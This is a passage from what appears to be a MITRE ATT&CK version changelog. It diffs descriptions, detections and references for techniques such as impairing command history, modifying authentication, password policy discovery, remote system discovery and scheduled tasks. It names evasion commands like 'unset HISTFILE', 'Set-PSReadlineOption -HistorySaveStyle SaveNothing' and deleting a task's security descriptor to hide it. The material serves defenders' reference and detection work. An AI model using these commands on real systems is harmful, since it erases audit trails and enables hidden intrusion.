>he PowerShell command <code>Set-PSReadlineOption -HistorySav>the PowerShell command <code>Set-PSReadlineOption -HistorySa
>eStyle SaveNothing</code>.(Citation: Microsoft PowerShell Co>veStyle SaveNothing</code>.(Citation: Microsoft PowerShell C
>mmand History)(Citation: Sophos PowerShell command audit)(Ci>ommand History)(Citation: Sophos PowerShell command audit)(C
>tation: Sophos PowerShell Command History Forensics)>itation: Sophos PowerShell Command History Forensics)  Adver
 >saries may also leverage a [Network Device CLI](https://atta
 >ck.mitre.org/techniques/T1059/008) on network devices to dis
 >able historical command logging (e.g. <code>no logging</code
 >>).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesjak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.
external_referencesCAPEC-13
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-13
external_referencesVikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:59:12.787000+00:002022-09-01 20:48:29.785000+00:00
descriptionAdversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging).
external_references[1]['source_name']capecSophos PowerShell command audit
external_references[1]['url']https://capec.mitre.org/data/definitions/13.htmlhttps://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
external_references[3]['source_name']Sophos PowerShell command auditSophos PowerShell Command History Forensics
external_references[3]['description']jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.
external_references[3]['url']https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audithttps://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
external_references[4]['source_name']Sophos PowerShell Command History Forensicscapec
external_references[4]['url']https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensicshttps://capec.mitre.org/data/definitions/13.html
x_mitre_detectionCorrelating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious. Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious. Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform. Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.
x_mitre_version2.02.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesUser Account: User Account Metadata
x_mitre_platformsNetwork

[T1556] Modify Authentication Process

Current version: 2.2

Version changed from: 2.0 → 2.2

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:48:33.990000+00:002022-10-18 16:28:56.126000+00:00
external_references[2]['source_name']Dell SkeletonXorrior Authorization Plugins
external_references[2]['description']Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.
external_references[2]['url']https://www.secureworks.com/research/skeleton-key-malware-analysishttps://xorrior.com/persistent-credential-theft/
external_references[3]['source_name']Xorrior Authorization PluginsDell Skeleton
external_references[3]['description']Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.
external_references[3]['url']https://xorrior.com/persistent-credential-theft/https://www.secureworks.com/research/skeleton-key-malware-analysis
external_references[4]['source_name']TechNet Audit Policydump_pwd_dcsync
external_references[4]['description']Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
external_references[4]['url']https://technet.microsoft.com/en-us/library/dn487457.aspxhttps://adsecurity.org/?p=2053
x_mitre_data_sources[7]File: File CreationApplication Log: Application Log Content
x_mitre_data_sources[8]Module: Module LoadUser Account: User Account Authentication
x_mitre_detectionMonitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins) Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins) Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Monitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The Store passwords using reversible encryption configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of -AllowReversiblePasswordEncryption $true, Set-ADUser and Set-ADAccountControl. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
x_mitre_version2.02.2
x_mitre_data_sources[2]Process: Process AccessModule: Module Load
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'}
x_mitre_data_sourcesFile: File Creation
x_mitre_data_sourcesActive Directory: Active Directory Object Modification
x_mitre_data_sourcesProcess: Process Access
x_mitre_data_sourcesUser Account: User Account Modification
x_mitre_platformsAzure AD
x_mitre_platformsGoogle Workspace
x_mitre_platformsIaaS
x_mitre_platformsOffice 365
x_mitre_platformsSaaS

[T1201] Password Policy Discovery

Current version: 1.5

Version changed from: 1.3 → 1.5


Old Description
New Description
t1Adversaries may attempt to access detailed information aboutt1Adversaries may attempt to access detailed information about
> the password policy used within an enterprise network or cl> the password policy used within an enterprise network or cl
>oud environment. Password policies are a way to enforce comp>oud environment. Password policies are a way to enforce comp
>lex passwords that are difficult to guess or crack through [>lex passwords that are difficult to guess or crack through [
>Brute Force](https://attack.mitre.org/techniques/T1110). Thi>Brute Force](https://attack.mitre.org/techniques/T1110). Thi
>s information may help the adversary to create a list of com>s information may help the adversary to create a list of com
>mon passwords and launch dictionary and/or brute force attac>mon passwords and launch dictionary and/or brute force attac
>ks which adheres to the policy (e.g. if the minimum password>ks which adheres to the policy (e.g. if the minimum password
> length should be 8, then not trying passwords such as 'pass> length should be 8, then not trying passwords such as 'pass
>123'; not checking for more than 3-4 passwords per account i>123'; not checking for more than 3-4 passwords per account i
>f the lockout is set to 6 as to not lock out accounts).  Pas>f the lockout is set to 6 as to not lock out accounts).  Pas
>sword policies can be set and discovered on Windows, Linux, >sword policies can be set and discovered on Windows, Linux, 
>and macOS systems via various command shell utilities such a>and macOS systems via various command shell utilities such a
>s <code>net accounts (/domain)</code>, <code>Get-ADDefaultDo>s <code>net accounts (/domain)</code>, <code>Get-ADDefaultDo
>mainPasswordPolicy</code>, <code>chage -l <username></code>,>mainPasswordPolicy</code>, <code>chage -l <username></code>,
> <code>cat /etc/pam.d/common-password</code>, and <code>pwpo> <code>cat /etc/pam.d/common-password</code>, and <code>pwpo
>licy getaccountpolicies</code> (Citation: Superuser Linux Pa>licy getaccountpolicies</code> (Citation: Superuser Linux Pa
>ssword Policies) (Citation: Jamf User Password Policies).  P>ssword Policies) (Citation: Jamf User Password Policies). Ad
>assword policies can be discovered in cloud environments usi>versaries may also leverage a [Network Device CLI](https://a
>ng available APIs such as <code>GetAccountPasswordPolicy</co>ttack.mitre.org/techniques/T1059/008) on network devices to 
>de> in AWS (Citation: AWS GetPasswordPolicy).>discover password policy information (e.g. <code>show aaa</c
 >ode>, <code>show aaa common-criteria policy all</code>).(Cit
 >ation: US-CERT-TA18-106A)  Password policies can be discover
 >ed in cloud environments using available APIs such as <code>
 >GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPas
 >swordPolicy).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 14:11:39.499000+00:002022-09-06 22:01:45.067000+00:00
descriptionAdversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A) Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).
external_references[1]['source_name']Superuser Linux Password PoliciesAWS GetPasswordPolicy
external_references[1]['description']Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.
external_references[1]['url']https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntuhttps://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html
external_references[3]['source_name']AWS GetPasswordPolicySuperuser Linux Password Policies
external_references[3]['description']Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.
external_references[3]['url']https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.htmlhttps://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu
x_mitre_contributors[1]Isif IbrahimaSudhanshu Chauhan, @Sudhanshu_C
x_mitre_contributors[2]Sudhanshu Chauhan, @Sudhanshu_CIsif Ibrahima, Mandiant
x_mitre_data_sources[0]User Account: User Account MetadataCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionUser Account: User Account Metadata
x_mitre_version1.31.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1018] Remote System Discovery

Current version: 3.4

Version changed from: 3.2 → 3.4


Old Description
New Description
t1Adversaries may attempt to get a listing of other systems byt1Adversaries may attempt to get a listing of other systems by
> IP address, hostname, or other logical identifier on a netw> IP address, hostname, or other logical identifier on a netw
>ork that may be used for Lateral Movement from the current s>ork that may be used for Lateral Movement from the current s
>ystem. Functionality could exist within remote access tools >ystem. Functionality could exist within remote access tools 
>to enable this, but utilities available on the operating sys>to enable this, but utilities available on the operating sys
>tem could also be used such as  [Ping](https://attack.mitre.>tem could also be used such as  [Ping](https://attack.mitre.
>org/software/S0097) or <code>net view</code> using [Net](htt>org/software/S0097) or <code>net view</code> using [Net](htt
>ps://attack.mitre.org/software/S0039). Adversaries may also >ps://attack.mitre.org/software/S0039).  Adversaries may also
>use local host files (ex: <code>C:\Windows\System32\Drivers\> analyze data from local host files (ex: <code>C:\Windows\Sy
>etc\hosts</code> or <code>/etc/hosts</code>) in order to dis>stem32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) 
>cover the hostname to IP address mappings of remote systems.>or other passive means (such as local [Arp](https://attack.m
>  >itre.org/software/S0099) cache entries) in order to discover
 > the presence of remote systems in an environment.  Adversar
 >ies may also target discovery of network infrastructure as w
 >ell as leverage [Network Device CLI](https://attack.mitre.or
 >g/techniques/T1059/008) commands on network devices to gathe
 >r detailed information about systems within a network (e.g. 
 ><code>show cdp neighbors</code>, <code>show arp</code>).(Cit
 >ation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS
 > May 2021)   
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
external_referencesCAPEC-292
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 15:30:00.172000+00:002022-09-06 22:04:59.486000+00:00
descriptionAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
external_references[1]['source_name']capecCISA AR21-126A FIVEHANDS May 2021
external_references[1]['url']https://capec.mitre.org/data/definitions/292.htmlhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
x_mitre_version3.23.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/292.html', 'external_id': 'CAPEC-292'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1053.005] Scheduled Task/Job: Scheduled Task

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may abuse the Windows Task Scheduler to perform t1Adversaries may abuse the Windows Task Scheduler to perform 
>task scheduling for initial or recurring execution of malici>task scheduling for initial or recurring execution of malici
>ous code. There are multiple ways to access the Task Schedul>ous code. There are multiple ways to access the Task Schedul
>er in Windows. The <code>schtasks</code> can be run directly>er in Windows. The [schtasks](https://attack.mitre.org/softw
> on the command line, or the Task Scheduler can be opened th>are/S0111) utility can be run directly on the command line, 
>rough the GUI within the Administrator Tools section of the >or the Task Scheduler can be opened through the GUI within t
>Control Panel. In some cases, adversaries have used a .NET w>he Administrator Tools section of the Control Panel. In some
>rapper for the Windows Task Scheduler, and alternatively, ad> cases, adversaries have used a .NET wrapper for the Windows
>versaries have used the Windows netapi32 library to create a> Task Scheduler, and alternatively, adversaries have used th
> scheduled task.  The deprecated [at](https://attack.mitre.o>e Windows netapi32 library to create a scheduled task.  The 
>rg/software/S0110) utility could also be abused by adversari>deprecated [at](https://attack.mitre.org/software/S0110) uti
>es (ex: [At (Windows)](https://attack.mitre.org/techniques/T>lity could also be abused by adversaries (ex: [At](https://a
>1053/002)), though <code>at.exe</code> can not access tasks >ttack.mitre.org/techniques/T1053/002)), though <code>at.exe<
>created with <code>schtasks</code> or the Control Panel.  An>/code> can not access tasks created with <code>schtasks</cod
> adversary may use Windows Task Scheduler to execute program>e> or the Control Panel.  An adversary may use Windows Task 
>s at system startup or on a scheduled basis for persistence.>Scheduler to execute programs at system startup or on a sche
> The Windows Task Scheduler can also be abused to conduct re>duled basis for persistence. The Windows Task Scheduler can 
>mote Execution as part of Lateral Movement and or to run a p>also be abused to conduct remote Execution as part of Latera
>rocess under the context of a specified account (such as SYS>l Movement and/or to run a process under the context of a sp
>TEM).>ecified account (such as SYSTEM). Similar to [System Binary 
 >Proxy Execution](https://attack.mitre.org/techniques/T1218),
 > adversaries have also abused the Windows Task Scheduler to 
 >potentially mask one-time execution under signed/trusted sys
 >tem processes.(Citation: ProofPoint Serpent)  Adversaries ma
 >y also create "hidden" scheduled tasks (i.e. [Hide Artifacts
 >](https://attack.mitre.org/techniques/T1564)) that may not b
 >e visible to defender tools and manual queries used to enume
 >rate tasks. Specifically, an adversary may hide a task from 
 >`schtasks /query` and the Task Scheduler by deleting the ass
 >ociated Security Descriptor (SD) registry value (where delet
 >ion of this value must be completed using SYSTEM permissions
 >).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adve
 >rsaries may also employ alternate methods to hide tasks, suc
 >h as altering the metadata (e.g., `Index` value) within asso
 >ciated registry keys.(Citation: Defending Against Scheduled 
 >Task Attacks in Windows Environments) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Andrew Northern, @ex_raritas', 'Bryan Campbell, @bry_campbell', 'Zachary Abzug, @ZackDoesML', 'Selena Larson, @selenalarson', 'Sittikorn Sangrattanapitak']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-30 14:26:44.730000+00:002022-07-06 20:20:13.871000+00:00
descriptionAdversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent) Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)
external_references[1]['source_name']Twitter Leoloobeek Scheduled TaskSigmaHQ
external_references[1]['description']Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022.
external_references[1]['url']https://twitter.com/leoloobeek/status/939248813465853953https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml
external_references[2]['source_name']TechNet Forum Scheduled Task Operational SettingProofPoint Serpent
external_references[2]['description']Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.
external_references[2]['url']https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8genhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
external_references[3]['source_name']TechNet Scheduled Task EventsDefending Against Scheduled Task Attacks in Windows Environments
external_references[3]['description']Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.
external_references[3]['url']https://technet.microsoft.com/library/dd315590.aspxhttps://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
external_references[4]['source_name']Microsoft Scheduled Task Events Win10Twitter Leoloobeek Scheduled Task
external_references[4]['description']Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.
external_references[4]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-eventshttps://twitter.com/leoloobeek/status/939248813465853953
external_references[5]['source_name']TechNet AutorunsTarrask scheduled task
external_references[5]['description']Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.
